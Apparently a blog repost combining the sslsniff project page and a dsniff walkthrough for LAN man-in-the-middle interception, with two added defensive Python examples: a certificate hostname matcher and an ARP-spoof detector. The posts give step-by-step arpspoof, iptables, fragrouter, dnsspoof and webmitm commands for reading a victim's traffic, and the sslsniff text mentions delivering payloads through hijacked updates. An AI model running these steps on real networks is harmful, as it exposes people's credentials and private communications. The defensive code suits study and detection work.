2011. 4. 25. 18:37

Intercepting SSL on a LAN by relaying certificates: sslsniff

Some History:

This tool was originally written to demonstrate and exploit IE's vulnerability to a specific "basicConstraints" man-in-the-middle attack. While Microsoft has since fixed the vulnerability that allowed leaf certificates to act as signing certificates, this tool is still occasionally useful for other purposes.

It is designed to MITM all SSL connections on a LAN and dynamically generates certs for the domains that are being accessed on the fly. The new certificates are constructed in a certificate chain that is signed by any certificate that you provide.

The New Scoop:

Version 0.6 has been significantly updated to additionally support the null-prefix attacks that I demonstrated at BlackHat 09 and Defcon 17. These allow for completely silent MITM attacks against SSL/TLS in the NSS, Microsoft CryptoAPI, and GnuTLS stacks — ultimately allowing for SSL communication in Firefox, Internet Explorer, Chrome, Thunderbird, Outlook, Evolution, Pidgin, AIM, irssi, and every other client that uses the Microsoft CryptoAPI to be intercepted.

sslsniff has also been updated to support the OCSP attacks that I published at Blackhat 09 and Defcon 17, thus making the revocation of null-prefix certificates very difficult. Additionally, sslsniff now supports modes for hijacking auto-updates from Mozilla products, as well as for Firefox/Thunderbird addons. Attackers can specify payloads of their choice, which will be delivered to the targets being man-in-the-middled.

sslsniff is useful for deploying other vulnerabilities as well. This is the tool that the people who pulled the recent MD5 hash collision publicity stunt used to demonstrate MITM attacks with their rogue CA-certificate. Also, anyone who is capable of obtaining a forged certificate by any means can easily deploy it through sslsniff with the targeted mode designed for null-prefix attacks.

For more information on these attacks, see the video from Defcon 17.

The three steps to get this running are:
  • Download, build and run sslsniff-0.7.tar.gz
  • Set up iptables
  • Run arpspoof

Installing sslsniff

  • Install the sslsniff dependencies (openssl, libboost1.35-dev, libboost-filesystem1.35-dev, libboost-thread1.35-dev, liblog4cpp5-dev)
  • Unpack sslsniff-0.7.tar.gz, run './configure', run 'make'

sslsniff requires Linux 2.4/2.6, although it can easily be ported to other platforms.

Running sslsniff

  • sslsniff can now be run in the old "authority" mode or the new "targeted" mode. You can specify a single cert to sign new certificates with, or you can specify a directory full of certificates to use for targeted attacks (these can be null-prefix or universal wildcard certificates).
  • sslsniff can now also defeat OCSP, fingerprint clients to attack, and hijack auto-updates.
  • See the README for more information on how to run sslsniff
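The null-prefix and universal-wildcard certificates that targeted mode uses work because of how the client matches the requested hostname against the certificate's subject name. The following Python is an added example, not code from sslsniff or from the original page: it puts a deliberately naive matcher (a C-string comparison that stops at the first NUL byte, and blanket acceptance of a '*' label) beside a hardened one, using constructed subject names. It illustrates the class of bug; it does not reproduce the actual NSS, CryptoAPI or GnuTLS code that was affected.

```python
"""Hostname matching against a certificate subject name.

The naive matcher below reproduces the two client-side bugs that sslsniff's
targeted mode relies on: a C-string comparison that stops at the first NUL
byte (null-prefix certificates) and blanket acceptance of a '*' label
(universal wildcard certificates). The hardened matcher applies the checks
a correct client makes. Illustrative code only, not sslsniff's and not the
NSS/CryptoAPI/GnuTLS code that was actually affected.
"""

NUL = "\x00"


def naive_match(cert_name: str, hostname: str) -> bool:
    """Vulnerable: treat the name as a C string and accept any wildcard."""
    # strcmp()-style code sees only the bytes before the first NUL, so a CA
    # that issued 'www.example.com\0.attacker.test' to the owner of
    # attacker.test has effectively issued a certificate for www.example.com.
    cstr = cert_name.split(NUL, 1)[0].lower()
    if cstr == "*":                      # universal wildcard: matches every host
        return True
    cert_labels = cstr.split(".")
    host_labels = hostname.lower().split(".")
    if len(cert_labels) != len(host_labels):
        return False
    return all(c == "*" or c == h for c, h in zip(cert_labels, host_labels))


def hardened_match(cert_name: str, hostname: str) -> bool:
    """Length-aware matching with RFC 6125-style wildcard rules."""
    # X.509 strings carry an explicit length; a NUL inside one is never a
    # terminator, so its presence is grounds to refuse the certificate.
    if NUL in cert_name or NUL in hostname:
        return False
    cert_labels = cert_name.lower().rstrip(".").split(".")
    host_labels = hostname.lower().rstrip(".").split(".")
    if not all(cert_labels) or not all(host_labels):
        return False                     # empty label (e.g. '' or 'a..b')
    if len(cert_labels) != len(host_labels):
        return False                     # '*.example.com' never covers a.b.example.com
    first, rest = cert_labels[0], cert_labels[1:]
    if any("*" in label for label in rest):
        return False                     # wildcard only in the leftmost label
    if first == "*":
        # refuse '*' and '*.com': a wildcard must leave at least two labels
        return len(rest) >= 2 and rest == host_labels[1:]
    if "*" in first:
        return False                     # partial wildcards such as 'w*' are not accepted
    return cert_labels == host_labels


# Constructed subject names for the comparison; not taken from real certificates.
SAMPLE_CERT_NAMES = {
    "legitimate": "www.example.com",
    "null_prefix": "www.example.com" + NUL + ".attacker.test",
    "universal_wildcard": "*",
}


def compare(hostname: str = "www.example.com") -> dict:
    """Return {name: (naive_result, hardened_result)} for each sample name."""
    return {k: (naive_match(v, hostname), hardened_match(v, hostname))
            for k, v in SAMPLE_CERT_NAMES.items()}


if __name__ == "__main__":
    for name, (naive, hard) in compare().items():
        print(f"{name:20s} naive={naive!s:5s} hardened={hard}")
```

The naive matcher accepts all three constructed names for www.example.com; the hardened one accepts only the legitimate name. Note that the hardened version is a hostname check alone: chain validation, revocation (which the OCSP attacks above target) and basicConstraints checks are separate steps a client must also get right.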

Setting up iptables

  • Flip your machine into ip_forward mode (echo 1 > /proc/sys/net/ipv4/ip_forward)
  • Add a rule to intercept SSL traffic (iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports <$listenPort>)
  • If you wish to fingerprint clients and only intercept some traffic based on client type, add a rule to intercept HTTP traffic (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports <$httpListenPort>)

Running arpspoof

Assuming we want to intercept SSL traffic from a particular host, we need to trick that host into thinking that we're the router. Using arpspoof, we can convince the target that the router's IP address belongs to our MAC address (the target to poison goes after -t, the address to impersonate comes last):

  • arpspoof -i eth0 -t <$targetIP> <$gatewayIP>

At this point, any SSL traffic should get proxied by sslsniff and logged to the file you specify.

Source: http://www.thoughtcrime.org/software/sslsniff/

2009. 6. 3. 15:14

Packet sniffing with dsniff

On a shared LAN, one host can sniff another host's outbound packets by ARP-spoofing the gateway's MAC address, so that the victim sends its traffic to the attacker instead of to the gateway.

The dsniff toolkit makes this easy.

Open three consoles and run one command in each.

1. Spoof the gateway's address (tell the target that the gateway's IP belongs to our MAC)
$ sudo arpspoof -i wlan0 -t <$targetIP> <$gatewayIP>

2. Forward the incoming packets back out to the network. (Without this the person using the victim machine loses connectivity; with it they keep using the internet exactly as before. -B1 is fragrouter's plain IP-forwarding mode, with no fragmentation tricks.)
$ sudo fragrouter -i wlan0 -B1

3. Capture the packets you want. (tcpdump options go before the filter expression; -w - writes raw pcap data to stdout.)
$ sudo tcpdump -i wlan0 -s 1500 -w - 'tcp dst port 80'

If the traffic uses SSL, capturing it this way shows only ciphertext. That case calls for a man-in-the-middle (MITM) attack.

The principle: sit between client and server, hand the client a fake certificate, and relay the packets to the real server while sniffing the plaintext. This only works if the user does not check the certificate properly when connecting.

If the user ignores a warning dialog like the one above, sniffing is possible. (Figure: IE6 certificate warning dialog)

Steps 1 and 2 are the same as above.

3. Spoof DNS (write the names to spoof, and the address to answer with, in a hosts file). This makes the victim connect to a server you choose instead of the real one.
$ cat host
<$attackerIP> *.sample.com
$ sudo dnsspoof -f host

4. Now relay the incoming packets to the real web server.
$ sudo webmitm -dd

During the relay, webmitm decrypts the traffic that the client encrypted under the fake certificate, so all of it can be read; toward the real web server it re-encrypts under the server's genuine certificate.
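Both posts above rely on the same first step, arpspoof binding the gateway's IP address to the attacker's MAC in the victim's ARP cache. The following Python is an added example, not part of dsniff, sslsniff or the original posts: a small offline detector for that poisoning, replayed over constructed ARP reply records (a live version would feed the same tuples from a sniffer). It flags an IP whose MAC changes and reports whether the new MAC was already seen under another IP, which with arpspoof is the attacker's own address, and it shows why a detector started after poisoning began needs a trusted seed.

```python
"""Offline detector for the ARP-cache poisoning that arpspoof performs.

arpspoof keeps sending ARP 'is-at' replies that bind the gateway's IP address
to the attacker's MAC. Two things give it away on the wire: the MAC recorded
for an IP changes, and the new MAC is already known under another IP (the
attacker's own). Added example, not part of dsniff or sslsniff; the ARP
records below are constructed, not captured.
"""
from collections import defaultdict

# Constructed ARP replies as (seconds, sender IP, sender MAC). A live version
# would feed these from a sniffer; only 'is-at' replies are needed.
SAMPLE_ARP_REPLIES = [
    (0.0, "192.168.0.1", "00:11:22:33:44:01"),   # real gateway answering a request
    (0.5, "192.168.0.10", "00:11:22:33:44:0a"),  # victim
    (0.7, "192.168.0.66", "DE:AD:BE:EF:00:66"),  # attacker's own address, before the attack
    (5.0, "192.168.0.1", "de:ad:be:ef:00:66"),   # arpspoof: gateway IP 'is-at' attacker MAC
    (7.0, "192.168.0.1", "de:ad:be:ef:00:66"),   # arpspoof repeats every couple of seconds
    (9.0, "192.168.0.1", "de:ad:be:ef:00:66"),
]


def detect_arp_spoof(replies, gateway_ip=None, trusted=None):
    """Replay ARP replies and return one alert per IP-to-MAC rebinding.

    trusted: optional {ip: mac} seed, e.g. the gateway MAC read from the
    router itself. Without it the first binding seen is taken as truth, so a
    detector started after poisoning began would accept the attacker's MAC.
    """
    ip_to_mac = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    mac_to_ips = defaultdict(set)
    for ip, mac in ip_to_mac.items():
        mac_to_ips[mac].add(ip)

    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()                # normalise case before comparing
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            alerts.append({
                "time": ts,
                "ip": ip,
                "old_mac": prev,
                "new_mac": mac,
                # other IPs this MAC already answered for; with arpspoof that is
                # the attacker's own address, which makes the alert unambiguous
                "also_claims": sorted(mac_to_ips[mac] - {ip}),
                "severity": "critical" if ip == gateway_ip else "warning",
            })
        ip_to_mac[ip] = mac              # the repeated replies no longer re-alert
        mac_to_ips[mac].add(ip)
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_ARP_REPLIES, gateway_ip="192.168.0.1"):
        print(alert)
```

On the constructed records the detector raises a single critical alert at t=5.0 for 192.168.0.1 moving from the gateway's MAC to de:ad:be:ef:00:66, noting that the same MAC already answered for 192.168.0.66. Replaying only the replies from t=5.0 onward produces no alert unless the gateway binding is supplied as a trusted seed, which is the practical caveat: pin the gateway MAC rather than trusting whatever the detector saw first.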

